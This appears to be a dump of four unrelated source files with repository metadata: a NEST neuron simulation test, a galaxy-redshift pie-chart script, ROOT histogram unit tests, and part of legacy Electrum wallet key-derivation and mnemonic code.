class ErfcNeuronTheoryTestCase(unittest.TestCase):
"""Compare results to theoretical predictions"""
def setUp(self):
"""defines parameters of simulation"""
self.sigma = np.logspace(-1, 1.1, 4)
self.theta = np.linspace(-6, 6, 15)
self.neuron = None
self.detector = None
self.T = 30000.
def build_and_connect_nodes(self, sigma, theta):
""" sets up an erfc neuron and spin detector. """
nest.hl_api.set_verbosity('M_WARNING')
nest.ResetKernel()
self.neuron = nest.Create('erfc_neuron', 1,
{'sigma': sigma, 'theta': theta})
self.detector = nest.Create('spin_detector', 1)
nest.Connect(self.neuron, self.detector)
def test_activation_function(self):
"""
simulates erfc neuron for different parameter sets and compares
activity to theoretical value.
"""
for sigma in self.sigma:
for theta in self.theta:
self.build_and_connect_nodes(sigma, theta)
nest.Simulate(self.T)
mean_activity = get_mean_activity(self.detector, self.T)
mean_activity_theory = activation_function_theory(sigma, theta)
                delta = np.max([2e-1 * mean_activity_theory *
                                (1. - mean_activity_theory), 1e-2])
self.assertAlmostEqual(
mean_activity,
mean_activity_theory,
delta=delta)
def suite():
suite1 = unittest.TestLoader().loadTestsFromTestCase(
ErfcNeuronTheoryTestCase)
return unittest.TestSuite([suite1])
def run():
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
if __name__ == "__main__":
run()
|
terhorstd/nest-simulator
|
pynest/nest/tests/test_erfc_neuron.py
|
Python
|
gpl-2.0
| 4,419
|
[
"NEURON"
] |
42013530851eb1af6cec53e2229d93c90ce83889e8ea24bd1093afb35f6e9256
|
#!/usr/bin/env python
# File: plot_histograms3.py
# Created on: Mon Aug 20 22:14:33 2012
# Last Change: Tue Jan 15 16:03:45 2013
# Purpose of script: <+INSERT+>
# Author: Steven Boada
import pylab as pyl
from mk_galaxy_struc import mk_galaxy_struc
galaxies = mk_galaxy_struc()
verylow = []
low = []
med = []
high = []
appendverylow = verylow.append
appendlow = low.append
appendmed = med.append
appendhigh = high.append
# Sort high-S/N galaxies into mutually exclusive ICD bins; anything
# outside the three bins is counted as "very low".
for galaxy in galaxies:
    if galaxy.ston_I >= 30.:
        if 0.04 <= galaxy.ICD_IH <= 0.11:
            appendlow(galaxy.z)
        elif 0.11 < galaxy.ICD_IH <= 0.18:
            appendmed(galaxy.z)
        elif 0.18 < galaxy.ICD_IH <= 0.25:
            appendhigh(galaxy.z)
        else:
            appendverylow(galaxy.z)
verylow1 = verylow2 = verylow3 = verylow4 = 0
low_1 = low_2 = low_3 = low_4 = 0
med_1 = med_2 = med_3 = med_4 = 0
high_1 = high_2 = high_3 = high_4 = 0
# Count each ICD class in the four redshift bins used by the pie charts.
for z in verylow:
    if 1.5 < z < 2.0:
        verylow1 += 1
    if 2.0 < z < 2.5:
        verylow2 += 1
    if 2.5 < z < 3.0:
        verylow3 += 1
    if 3.0 < z < 3.5:
        verylow4 += 1
for z in low:
    if 1.5 < z < 2.0:
        low_1 += 1
    if 2.0 < z < 2.5:
        low_2 += 1
    if 2.5 < z < 3.0:
        low_3 += 1
    if 3.0 < z < 3.5:
        low_4 += 1
for z in med:
    if 1.5 < z < 2.0:
        med_1 += 1
    if 2.0 < z < 2.5:
        med_2 += 1
    if 2.5 < z < 3.0:
        med_3 += 1
    if 3.0 < z < 3.5:
        med_4 += 1
for z in high:
    if 1.5 < z < 2.0:
        high_1 += 1
    if 2.0 < z < 2.5:
        high_2 += 1
    if 2.5 < z < 3.0:
        high_3 += 1
    if 3.0 < z < 3.5:
        high_4 += 1
total1 = float(low_1 + med_1 + high_1 + verylow1)
total2 = float(low_2 + med_2 + high_2 + verylow2)
total3 = float(low_3 + med_3 + high_3 + verylow3)
total4 = float(low_4 + med_4 + high_4 + verylow4)
f1, f1s = pyl.subplots(4, 1, figsize=(3,9))
f1s1 = f1s[0]
f1s2 = f1s[1]
f1s3 = f1s[2]
f1s4 = f1s[3]
labels = '1.5 < z < 2.0', '2.0 < z < 2.5', '2.5 < z < 3.0', '3.0 < z < 3.5'
fractions = [verylow1/total1, low_1/total1, med_1/total1, high_1/total1]
f1s1.pie(fractions, autopct='%1.f%%', pctdistance=1.2, shadow=True)
fractions = [verylow2/total2, low_2/total2, med_2/total2, high_2/total2]
f1s2.pie(fractions, autopct='%1.f%%', pctdistance=1.2, shadow=True)
fractions = [verylow3/total3, low_3/total3, med_3/total3, high_3/total3]
f1s3.pie(fractions, autopct='%1.f%%', pctdistance=1.2, shadow=True)
fractions = [verylow4/total4, low_4/total4, med_4/total4, high_4/total4]
f1s4.pie(fractions, autopct='%1.f%%', pctdistance=1.2, shadow=True)
# Tweak the plot.
#pyl.legend(loc='center right')
#pyl.subplots_adjust(left=0.15, bottom=0.15)
#pyl.xlabel("Redshift")
#pyl.ylabel(r"$N/N_{bin}$")
#pyl.savefig('icd_vs_z_hist_IH.eps',bbox='tight')
pyl.show()
|
boada/ICD
|
sandbox/legacy_plot_code/plot_pie_IH.py
|
Python
|
mit
| 2,930
|
[
"Galaxy"
] |
c6453a595a231a0280aa98d94f2f9326dddc190e6943378a663060636ec32ca7
|
import unittest2 as unittest
import ROOT
from monitoring_app import tasks
class TestPages(unittest.TestCase):
def setUp(self):
self.fextension = 'root'
# The fname and keys match those of the data generated by
# `generate_histograms.py`
self.dummy_fname = 'histograms.root'
self.dummy_keys = ['histogram_{0}'.format(i) for i in range(4)]
self.dummy_th1 = ROOT.TH1F('dummy:xtitle:ytitle', 'dummy', 10, 0, 1)
self.dummy_th1.FillRandom('gaus', 1000)
def tearDown(self):
# Delete TH1 so we don't create multiple instances with the same name
del self.dummy_th1
def test_add_file_extension(self):
"""Extension is added to a filename when not present."""
fname = 'filename'
fname_expected = '{0}.{1}'.format(fname, self.fextension)
assert tasks.add_file_extension(fname) == fname_expected
def test_dont_add_file_extension_again(self):
"""Extension is not added to a filename if already present."""
fname = 'filename.{0}'.format(self.fextension)
assert tasks.add_file_extension(fname) == fname
def test_data_for_th1f(self):
"""Appropriate information is provided on TH1F ROOT objects."""
data = tasks.data_for_object(self.dummy_th1)
for key in ('binning', 'values', 'uncertainties', 'axis_titles'):
assert key in data
nbins = self.dummy_th1.GetNbinsX()
assert len(data['binning']) == nbins
assert len(data['values']) == nbins
assert len(data['uncertainties']) == nbins
assert len(data['axis_titles']) == 2
assert data['axis_titles'][0] == self.dummy_th1.GetXaxis().GetTitle()
assert data['axis_titles'][1] == self.dummy_th1.GetYaxis().GetTitle()
def test_data_for_unknown_tobject(self):
"""No information should be returned for unsupported ROOT objects."""
# Use a child of TObject that we don't support
obj = ROOT.TH3D()
data = tasks.data_for_object(obj)
assert not data
def test_get_key_from_file(self):
"""Dictionary describing key in file is returned."""
data = tasks.get_key_from_file(self.dummy_fname, self.dummy_keys[0])
for k in ('success', 'data'):
assert k in data
data_data = data['data']
assert data['success'] == True
assert data_data
for k in ('filename', 'key_name', 'key_title', 'key_class', 'key_data'):
assert k in data_data
assert data_data['filename'].endswith(self.dummy_fname)
assert data_data['key_name'] == self.dummy_keys[0]
assert data_data['key_title'] == 'Gaussian'
assert data_data['key_class'] == 'TH1F'
def test_get_key_from_file_invalid_filename(self):
"""Error dictionary is returned with message."""
# As this test intentionally tries to open a non-existent file, which
# ROOT would by default print an error about, temporarily change the
# logging level to suppress such a message
originalErrorIgnoreLevel = ROOT.gErrorIgnoreLevel
ROOT.gErrorIgnoreLevel = ROOT.kFatal
data = tasks.get_key_from_file('fake_file.root', self.dummy_keys[0])
ROOT.gErrorIgnoreLevel = originalErrorIgnoreLevel
for k in ('success', 'message'):
assert k in data
assert 'data' not in data
assert data['success'] == False
assert data['message'].startswith('Could not open')
def test_get_key_from_file_invalid_key_name(self):
"""Error dictionary is returned with message."""
data = tasks.get_key_from_file(self.dummy_fname, 'fake_key')
for k in ('success', 'message'):
assert k in data
assert 'data' not in data
assert data['success'] == False
assert data['message'].startswith('Could not find')
if __name__ == '__main__':
unittest.main()
|
alexpearce/example-monitoring-app
|
tests/test_tasks.py
|
Python
|
mit
| 3,930
|
[
"Gaussian"
] |
9c4a576ad1275b8089e197e5fc5482f168da960dc7bc03dac5ffc99a4ae5b5ba
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import hashlib
import hmac
import ecdsa
from ecdsa.curves import SECP256k1
from ecdsa.util import string_to_number, number_to_string
from ecdsa.ecdsa import curve_secp256k1, generator_secp256k1
# list of words from http://en.wiktionary.org/wiki/Wiktionary:Frequency_lists/Contemporary_poetry
words = [
"like",
"just",
"love",
"know",
"never",
"want",
"time",
"out",
"there",
"make",
"look",
"eye",
"down",
"only",
"think",
"heart",
"back",
"then",
"into",
"about",
"more",
"away",
"still",
"them",
"take",
"thing",
"even",
"through",
"long",
"always",
"world",
"too",
"friend",
"tell",
"try",
"hand",
"thought",
"over",
"here",
"other",
"need",
"smile",
"again",
"much",
"cry",
"been",
"night",
"ever",
"little",
"said",
"end",
"some",
"those",
"around",
"mind",
"people",
"girl",
"leave",
"dream",
"left",
"turn",
"myself",
"give",
"nothing",
"really",
"off",
"before",
"something",
"find",
"walk",
"wish",
"good",
"once",
"place",
"ask",
"stop",
"keep",
"watch",
"seem",
"everything",
"wait",
"got",
"yet",
"made",
"remember",
"start",
"alone",
"run",
"hope",
"maybe",
"believe",
"body",
"hate",
"after",
"close",
"talk",
"stand",
"own",
"each",
"hurt",
"help",
"home",
"god",
"soul",
"new",
"many",
"two",
"inside",
"should",
"true",
"first",
"fear",
"mean",
"better",
"play",
"another",
"gone",
"change",
"use",
"wonder",
"someone",
"hair",
"cold",
"open",
"best",
"any",
"behind",
"happen",
"water",
"dark",
"laugh",
"stay",
"forever",
"name",
"work",
"show",
"sky",
"break",
"came",
"deep",
"door",
"put",
"black",
"together",
"upon",
"happy",
"such",
"great",
"white",
"matter",
"fill",
"past",
"please",
"burn",
"cause",
"enough",
"touch",
"moment",
"soon",
"voice",
"scream",
"anything",
"stare",
"sound",
"red",
"everyone",
"hide",
"kiss",
"truth",
"death",
"beautiful",
"mine",
"blood",
"broken",
"very",
"pass",
"next",
"forget",
"tree",
"wrong",
"air",
"mother",
"understand",
"lip",
"hit",
"wall",
"memory",
"sleep",
"free",
"high",
"realize",
"school",
"might",
"skin",
"sweet",
"perfect",
"blue",
"kill",
"breath",
"dance",
"against",
"fly",
"between",
"grow",
"strong",
"under",
"listen",
"bring",
"sometimes",
"speak",
"pull",
"person",
"become",
"family",
"begin",
"ground",
"real",
"small",
"father",
"sure",
"feet",
"rest",
"young",
"finally",
"land",
"across",
"today",
"different",
"guy",
"line",
"fire",
"reason",
"reach",
"second",
"slowly",
"write",
"eat",
"smell",
"mouth",
"step",
"learn",
"three",
"floor",
"promise",
"breathe",
"darkness",
"push",
"earth",
"guess",
"save",
"song",
"above",
"along",
"both",
"color",
"house",
"almost",
"sorry",
"anymore",
"brother",
"okay",
"dear",
"game",
"fade",
"already",
"apart",
"warm",
"beauty",
"heard",
"notice",
"question",
"shine",
"began",
"piece",
"whole",
"shadow",
"secret",
"street",
"within",
"finger",
"point",
"morning",
"whisper",
"child",
"moon",
"green",
"story",
"glass",
"kid",
"silence",
"since",
"soft",
"yourself",
"empty",
"shall",
"angel",
"answer",
"baby",
"bright",
"dad",
"path",
"worry",
"hour",
"drop",
"follow",
"power",
"war",
"half",
"flow",
"heaven",
"act",
"chance",
"fact",
"least",
"tired",
"children",
"near",
"quite",
"afraid",
"rise",
"sea",
"taste",
"window",
"cover",
"nice",
"trust",
"lot",
"sad",
"cool",
"force",
"peace",
"return",
"blind",
"easy",
"ready",
"roll",
"rose",
"drive",
"held",
"music",
"beneath",
"hang",
"mom",
"paint",
"emotion",
"quiet",
"clear",
"cloud",
"few",
"pretty",
"bird",
"outside",
"paper",
"picture",
"front",
"rock",
"simple",
"anyone",
"meant",
"reality",
"road",
"sense",
"waste",
"bit",
"leaf",
"thank",
"happiness",
"meet",
"men",
"smoke",
"truly",
"decide",
"self",
"age",
"book",
"form",
"alive",
"carry",
"escape",
"damn",
"instead",
"able",
"ice",
"minute",
"throw",
"catch",
"leg",
"ring",
"course",
"goodbye",
"lead",
"poem",
"sick",
"corner",
"desire",
"known",
"problem",
"remind",
"shoulder",
"suppose",
"toward",
"wave",
"drink",
"jump",
"woman",
"pretend",
"sister",
"week",
"human",
"joy",
"crack",
"grey",
"pray",
"surprise",
"dry",
"knee",
"less",
"search",
"bleed",
"caught",
"clean",
"embrace",
"future",
"king",
"son",
"sorrow",
"chest",
"hug",
"remain",
"sat",
"worth",
"blow",
"daddy",
"final",
"parent",
"tight",
"also",
"create",
"lonely",
"safe",
"cross",
"dress",
"evil",
"silent",
"bone",
"fate",
"perhaps",
"anger",
"class",
"scar",
"snow",
"tiny",
"tonight",
"continue",
"control",
"dog",
"edge",
"mirror",
"month",
"suddenly",
"comfort",
"given",
"loud",
"quickly",
"gaze",
"plan",
"rush",
"stone",
"town",
"battle",
"ignore",
"spirit",
"stood",
"stupid",
"yours",
"brown",
"build",
"dust",
"hey",
"kept",
"pay",
"phone",
"twist",
"although",
"ball",
"beyond",
"hidden",
"nose",
"taken",
"fail",
"float",
"pure",
"somehow",
"wash",
"wrap",
"angry",
"cheek",
"creature",
"forgotten",
"heat",
"rip",
"single",
"space",
"special",
"weak",
"whatever",
"yell",
"anyway",
"blame",
"job",
"choose",
"country",
"curse",
"drift",
"echo",
"figure",
"grew",
"laughter",
"neck",
"suffer",
"worse",
"yeah",
"disappear",
"foot",
"forward",
"knife",
"mess",
"somewhere",
"stomach",
"storm",
"beg",
"idea",
"lift",
"offer",
"breeze",
"field",
"five",
"often",
"simply",
"stuck",
"win",
"allow",
"confuse",
"enjoy",
"except",
"flower",
"seek",
"strength",
"calm",
"grin",
"gun",
"heavy",
"hill",
"large",
"ocean",
"shoe",
"sigh",
"straight",
"summer",
"tongue",
"accept",
"crazy",
"everyday",
"exist",
"grass",
"mistake",
"sent",
"shut",
"surround",
"table",
"ache",
"brain",
"destroy",
"heal",
"nature",
"shout",
"sign",
"stain",
"choice",
"doubt",
"glance",
"glow",
"mountain",
"queen",
"stranger",
"throat",
"tomorrow",
"city",
"either",
"fish",
"flame",
"rather",
"shape",
"spin",
"spread",
"ash",
"distance",
"finish",
"image",
"imagine",
"important",
"nobody",
"shatter",
"warmth",
"became",
"feed",
"flesh",
"funny",
"lust",
"shirt",
"trouble",
"yellow",
"attention",
"bare",
"bite",
"money",
"protect",
"amaze",
"appear",
"born",
"choke",
"completely",
"daughter",
"fresh",
"friendship",
"gentle",
"probably",
"six",
"deserve",
"expect",
"grab",
"middle",
"nightmare",
"river",
"thousand",
"weight",
"worst",
"wound",
"barely",
"bottle",
"cream",
"regret",
"relationship",
"stick",
"test",
"crush",
"endless",
"fault",
"itself",
"rule",
"spill",
"art",
"circle",
"join",
"kick",
"mask",
"master",
"passion",
"quick",
"raise",
"smooth",
"unless",
"wander",
"actually",
"broke",
"chair",
"deal",
"favorite",
"gift",
"note",
"number",
"sweat",
"box",
"chill",
"clothes",
"lady",
"mark",
"park",
"poor",
"sadness",
"tie",
"animal",
"belong",
"brush",
"consume",
"dawn",
"forest",
"innocent",
"pen",
"pride",
"stream",
"thick",
"clay",
"complete",
"count",
"draw",
"faith",
"press",
"silver",
"struggle",
"surface",
"taught",
"teach",
"wet",
"bless",
"chase",
"climb",
"enter",
"letter",
"melt",
"metal",
"movie",
"stretch",
"swing",
"vision",
"wife",
"beside",
"crash",
"forgot",
"guide",
"haunt",
"joke",
"knock",
"plant",
"pour",
"prove",
"reveal",
"steal",
"stuff",
"trip",
"wood",
"wrist",
"bother",
"bottom",
"crawl",
"crowd",
"fix",
"forgive",
"frown",
"grace",
"loose",
"lucky",
"party",
"release",
"surely",
"survive",
"teacher",
"gently",
"grip",
"speed",
"suicide",
"travel",
"treat",
"vein",
"written",
"cage",
"chain",
"conversation",
"date",
"enemy",
"however",
"interest",
"million",
"page",
"pink",
"proud",
"sway",
"themselves",
"winter",
"church",
"cruel",
"cup",
"demon",
"experience",
"freedom",
"pair",
"pop",
"purpose",
"respect",
"shoot",
"softly",
"state",
"strange",
"bar",
"birth",
"curl",
"dirt",
"excuse",
"lord",
"lovely",
"monster",
"order",
"pack",
"pants",
"pool",
"scene",
"seven",
"shame",
"slide",
"ugly",
"among",
"blade",
"blonde",
"closet",
"creek",
"deny",
"drug",
"eternity",
"gain",
"grade",
"handle",
"key",
"linger",
"pale",
"prepare",
"swallow",
"swim",
"tremble",
"wheel",
"won",
"cast",
"cigarette",
"claim",
"college",
"direction",
"dirty",
"gather",
"ghost",
"hundred",
"loss",
"lung",
"orange",
"present",
"swear",
"swirl",
"twice",
"wild",
"bitter",
"blanket",
"doctor",
"everywhere",
"flash",
"grown",
"knowledge",
"numb",
"pressure",
"radio",
"repeat",
"ruin",
"spend",
"unknown",
"buy",
"clock",
"devil",
"early",
"false",
"fantasy",
"pound",
"precious",
"refuse",
"sheet",
"teeth",
"welcome",
"add",
"ahead",
"block",
"bury",
"caress",
"content",
"depth",
"despite",
"distant",
"marry",
"purple",
"threw",
"whenever",
"bomb",
"dull",
"easily",
"grasp",
"hospital",
"innocence",
"normal",
"receive",
"reply",
"rhyme",
"shade",
"someday",
"sword",
"toe",
"visit",
"asleep",
"bought",
"center",
"consider",
"flat",
"hero",
"history",
"ink",
"insane",
"muscle",
"mystery",
"pocket",
"reflection",
"shove",
"silently",
"smart",
"soldier",
"spot",
"stress",
"train",
"type",
"view",
"whether",
"bus",
"energy",
"explain",
"holy",
"hunger",
"inch",
"magic",
"mix",
"noise",
"nowhere",
"prayer",
"presence",
"shock",
"snap",
"spider",
"study",
"thunder",
"trail",
"admit",
"agree",
"bag",
"bang",
"bound",
"butterfly",
"cute",
"exactly",
"explode",
"familiar",
"fold",
"further",
"pierce",
"reflect",
"scent",
"selfish",
"sharp",
"sink",
"spring",
"stumble",
"universe",
"weep",
"women",
"wonderful",
"action",
"ancient",
"attempt",
"avoid",
"birthday",
"branch",
"chocolate",
"core",
"depress",
"drunk",
"especially",
"focus",
"fruit",
"honest",
"match",
"palm",
"perfectly",
"pillow",
"pity",
"poison",
"roar",
"shift",
"slightly",
"thump",
"truck",
"tune",
"twenty",
"unable",
"wipe",
"wrote",
"coat",
"constant",
"dinner",
"drove",
"egg",
"eternal",
"flight",
"flood",
"frame",
"freak",
"gasp",
"glad",
"hollow",
"motion",
"peer",
"plastic",
"root",
"screen",
"season",
"sting",
"strike",
"team",
"unlike",
"victim",
"volume",
"warn",
"weird",
"attack",
"await",
"awake",
"built",
"charm",
"crave",
"despair",
"fought",
"grant",
"grief",
"horse",
"limit",
"message",
"ripple",
"sanity",
"scatter",
"serve",
"split",
"string",
"trick",
"annoy",
"blur",
"boat",
"brave",
"clearly",
"cling",
"connect",
"fist",
"forth",
"imagination",
"iron",
"jock",
"judge",
"lesson",
"milk",
"misery",
"nail",
"naked",
"ourselves",
"poet",
"possible",
"princess",
"sail",
"size",
"snake",
"society",
"stroke",
"torture",
"toss",
"trace",
"wise",
"bloom",
"bullet",
"cell",
"check",
"cost",
"darling",
"during",
"footstep",
"fragile",
"hallway",
"hardly",
"horizon",
"invisible",
"journey",
"midnight",
"mud",
"nod",
"pause",
"relax",
"shiver",
"sudden",
"value",
"youth",
"abuse",
"admire",
"blink",
"breast",
"bruise",
"constantly",
"couple",
"creep",
"curve",
"difference",
"dumb",
"emptiness",
"gotta",
"honor",
"plain",
"planet",
"recall",
"rub",
"ship",
"slam",
"soar",
"somebody",
"tightly",
"weather",
"adore",
"approach",
"bond",
"bread",
"burst",
"candle",
"coffee",
"cousin",
"crime",
"desert",
"flutter",
"frozen",
"grand",
"heel",
"hello",
"language",
"level",
"movement",
"pleasure",
"powerful",
"random",
"rhythm",
"settle",
"silly",
"slap",
"sort",
"spoken",
"steel",
"threaten",
"tumble",
"upset",
"aside",
"awkward",
"bee",
"blank",
"board",
"button",
"card",
"carefully",
"complain",
"crap",
"deeply",
"discover",
"drag",
"dread",
"effort",
"entire",
"fairy",
"giant",
"gotten",
"greet",
"illusion",
"jeans",
"leap",
"liquid",
"march",
"mend",
"nervous",
"nine",
"replace",
"rope",
"spine",
"stole",
"terror",
"accident",
"apple",
"balance",
"boom",
"childhood",
"collect",
"demand",
"depression",
"eventually",
"faint",
"glare",
"goal",
"group",
"honey",
"kitchen",
"laid",
"limb",
"machine",
"mere",
"mold",
"murder",
"nerve",
"painful",
"poetry",
"prince",
"rabbit",
"shelter",
"shore",
"shower",
"soothe",
"stair",
"steady",
"sunlight",
"tangle",
"tease",
"treasure",
"uncle",
"begun",
"bliss",
"canvas",
"cheer",
"claw",
"clutch",
"commit",
"crimson",
"crystal",
"delight",
"doll",
"existence",
"express",
"fog",
"football",
"gay",
"goose",
"guard",
"hatred",
"illuminate",
"mass",
"math",
"mourn",
"rich",
"rough",
"skip",
"stir",
"student",
"style",
"support",
"thorn",
"tough",
"yard",
"yearn",
"yesterday",
"advice",
"appreciate",
"autumn",
"bank",
"beam",
"bowl",
"capture",
"carve",
"collapse",
"confusion",
"creation",
"dove",
"feather",
"girlfriend",
"glory",
"government",
"harsh",
"hop",
"inner",
"loser",
"moonlight",
"neighbor",
"neither",
"peach",
"pig",
"praise",
"screw",
"shield",
"shimmer",
"sneak",
"stab",
"subject",
"throughout",
"thrown",
"tower",
"twirl",
"wow",
"army",
"arrive",
"bathroom",
"bump",
"cease",
"cookie",
"couch",
"courage",
"dim",
"guilt",
"howl",
"hum",
"husband",
"insult",
"led",
"lunch",
"mock",
"mostly",
"natural",
"nearly",
"needle",
"nerd",
"peaceful",
"perfection",
"pile",
"price",
"remove",
"roam",
"sanctuary",
"serious",
"shiny",
"shook",
"sob",
"stolen",
"tap",
"vain",
"void",
"warrior",
"wrinkle",
"affection",
"apologize",
"blossom",
"bounce",
"bridge",
"cheap",
"crumble",
"decision",
"descend",
"desperately",
"dig",
"dot",
"flip",
"frighten",
"heartbeat",
"huge",
"lazy",
"lick",
"odd",
"opinion",
"process",
"puzzle",
"quietly",
"retreat",
"score",
"sentence",
"separate",
"situation",
"skill",
"soak",
"square",
"stray",
"taint",
"task",
"tide",
"underneath",
"veil",
"whistle",
"anywhere",
"bedroom",
"bid",
"bloody",
"burden",
"careful",
"compare",
"concern",
"curtain",
"decay",
"defeat",
"describe",
"double",
"dreamer",
"driver",
"dwell",
"evening",
"flare",
"flicker",
"grandma",
"guitar",
"harm",
"horrible",
"hungry",
"indeed",
"lace",
"melody",
"monkey",
"nation",
"object",
"obviously",
"rainbow",
"salt",
"scratch",
"shown",
"shy",
"stage",
"stun",
"third",
"tickle",
"useless",
"weakness",
"worship",
"worthless",
"afternoon",
"beard",
"boyfriend",
"bubble",
"busy",
"certain",
"chin",
"concrete",
"desk",
"diamond",
"doom",
"drawn",
"due",
"felicity",
"freeze",
"frost",
"garden",
"glide",
"harmony",
"hopefully",
"hunt",
"jealous",
"lightning",
"mama",
"mercy",
"peel",
"physical",
"position",
"pulse",
"punch",
"quit",
"rant",
"respond",
"salty",
"sane",
"satisfy",
"savior",
"sheep",
"slept",
"social",
"sport",
"tuck",
"utter",
"valley",
"wolf",
"aim",
"alas",
"alter",
"arrow",
"awaken",
"beaten",
"belief",
"brand",
"ceiling",
"cheese",
"clue",
"confidence",
"connection",
"daily",
"disguise",
"eager",
"erase",
"essence",
"everytime",
"expression",
"fan",
"flag",
"flirt",
"foul",
"fur",
"giggle",
"glorious",
"ignorance",
"law",
"lifeless",
"measure",
"mighty",
"muse",
"north",
"opposite",
"paradise",
"patience",
"patient",
"pencil",
"petal",
"plate",
"ponder",
"possibly",
"practice",
"slice",
"spell",
"stock",
"strife",
"strip",
"suffocate",
"suit",
"tender",
"tool",
"trade",
"velvet",
"verse",
"waist",
"witch",
"aunt",
"bench",
"bold",
"cap",
"certainly",
"click",
"companion",
"creator",
"dart",
"delicate",
"determine",
"dish",
"dragon",
"drama",
"drum",
"dude",
"everybody",
"feast",
"forehead",
"former",
"fright",
"fully",
"gas",
"hook",
"hurl",
"invite",
"juice",
"manage",
"moral",
"possess",
"raw",
"rebel",
"royal",
"scale",
"scary",
"several",
"slight",
"stubborn",
"swell",
"talent",
"tea",
"terrible",
"thread",
"torment",
"trickle",
"usually",
"vast",
"violence",
"weave",
"acid",
"agony",
"ashamed",
"awe",
"belly",
"blend",
"blush",
"character",
"cheat",
"common",
"company",
"coward",
"creak",
"danger",
"deadly",
"defense",
"define",
"depend",
"desperate",
"destination",
"dew",
"duck",
"dusty",
"embarrass",
"engine",
"example",
"explore",
"foe",
"freely",
"frustrate",
"generation",
"glove",
"guilty",
"health",
"hurry",
"idiot",
"impossible",
"inhale",
"jaw",
"kingdom",
"mention",
"mist",
"moan",
"mumble",
"mutter",
"observe",
"ode",
"pathetic",
"pattern",
"pie",
"prefer",
"puff",
"rape",
"rare",
"revenge",
"rude",
"scrape",
"spiral",
"squeeze",
"strain",
"sunset",
"suspend",
"sympathy",
"thigh",
"throne",
"total",
"unseen",
"weapon",
"weary"
]
n = 1626
# Note about US patent no 5892470: Here each word does not represent a given digit.
# Instead, the digit represented by a word is variable, it depends on the previous word.
def mn_encode( message ):
out = []
for i in range(len(message)/8):
word = message[8*i:8*i+8]
x = int(word, 16)
w1 = (x%n)
w2 = ((x/n) + w1)%n
w3 = ((x/n/n) + w2)%n
out += [ words[w1], words[w2], words[w3] ]
return out
def mn_decode( wlist ):
out = ''
for i in range(len(wlist)/3):
word1, word2, word3 = wlist[3*i:3*i+3]
w1 = words.index(word1)
w2 = (words.index(word2))%n
w3 = (words.index(word3))%n
x = w1 +n*((w2-w1)%n) +n*n*((w3-w2)%n)
out += '%08x'%x
return out
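# Round-trip example (a minimal sketch; assumes Python 2 integer division,
# matching the code above): each 8-hex-digit chunk maps to three words.
# mn_encode('00000000') -> ['like', 'like', 'like'] (words[0] is 'like')
# mn_decode(['like', 'like', 'like']) -> '00000000'
# mn_decode(mn_encode('0123abcd')) == '0123abcd', since 0x0123abcd < n**3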
def stretch_key(seed):
oldseed = seed
for i in range(100000):
seed = hashlib.sha256(seed + oldseed).digest()
return string_to_number( seed )
def mpk_from_seed(seed):
curve = SECP256k1
secexp = stretch_key(seed)
master_private_key = ecdsa.SigningKey.from_secret_exponent( secexp, curve = SECP256k1 )
master_public_key = master_private_key.get_verifying_key().to_string().encode('hex')
return master_public_key
class Account(object):
def __init__(self, v):
self.addresses = v.get('0', [])
self.change = v.get('1', [])
def dump(self):
return {'0':self.addresses, '1':self.change}
def get_addresses(self, for_change):
return self.change[:] if for_change else self.addresses[:]
def create_new_address(self, for_change):
addresses = self.change if for_change else self.addresses
n = len(addresses)
address = self.get_address( for_change, n)
addresses.append(address)
return address
def get_address(self, for_change, n):
pass
def get_pubkeys(self, sequence):
return [ self.get_pubkey( *sequence )]
class OldAccount(Account):
""" Privatekey(type,n) = Master_private_key + H(n|S|type) """
def __init__(self, v):
self.addresses = v.get(0, [])
self.change = v.get(1, [])
self.mpk = v['mpk'].decode('hex')
def dump(self):
return {0:self.addresses, 1:self.change}
@classmethod
def mpk_from_seed(klass, seed):
curve = SECP256k1
secexp = klass.stretch_key(seed)
master_private_key = ecdsa.SigningKey.from_secret_exponent( secexp, curve = SECP256k1 )
master_public_key = master_private_key.get_verifying_key().to_string().encode('hex')
return master_public_key
@classmethod
def stretch_key(self,seed):
oldseed = seed
for i in range(100000):
seed = hashlib.sha256(seed + oldseed).digest()
return string_to_number( seed )
def get_sequence(self, for_change, n):
return string_to_number( Hash( "%d:%d:"%(n,for_change) + self.mpk ) )
def get_address(self, for_change, n):
pubkey = self.get_pubkey(for_change, n)
address = public_key_to_bc_address( pubkey.decode('hex') )
return address
def get_pubkey(self, for_change, n):
curve = SECP256k1
mpk = self.mpk
z = self.get_sequence(for_change, n)
master_public_key = ecdsa.VerifyingKey.from_string( mpk, curve = SECP256k1 )
pubkey_point = master_public_key.pubkey.point + z*curve.generator
public_key2 = ecdsa.VerifyingKey.from_public_point( pubkey_point, curve = SECP256k1 )
return '04' + public_key2.to_string().encode('hex')
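# Note: this mirrors the private-key derivation below via the EC homomorphism:
# if secexp' = secexp + z (mod order), then the matching public point is
# pubkey' = pubkey + z*G, so addresses can be derived from `mpk` alone
# (a watch-only wallet) without ever touching the seed.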
def get_private_key_from_stretched_exponent(self, for_change, n, secexp):
order = generator_secp256k1.order()
secexp = ( secexp + self.get_sequence(for_change, n) ) % order
pk = number_to_string( secexp, generator_secp256k1.order() )
compressed = False
return SecretToASecret( pk, compressed )  # SecretToASecret is defined in Electrum's bitcoin module in the original codebase
def get_private_key(self, seed, sequence):
for_change, n = sequence
secexp = self.stretch_key(seed)
return self.get_private_key_from_stretched_exponent(for_change, n, secexp)
def check_seed(self, seed):
curve = SECP256k1
secexp = self.stretch_key(seed)
master_private_key = ecdsa.SigningKey.from_secret_exponent( secexp, curve = SECP256k1 )
master_public_key = master_private_key.get_verifying_key().to_string().encode('hex')
if master_public_key != self.mpk:
print_error('invalid password (mpk)')  # print_error is provided by Electrum's util module in the original codebase
raise BaseException('Invalid password')
return True
def redeem_script(self, sequence):
return None
def b58encode(v):
""" encode v, which is a string of bytes, to base58."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
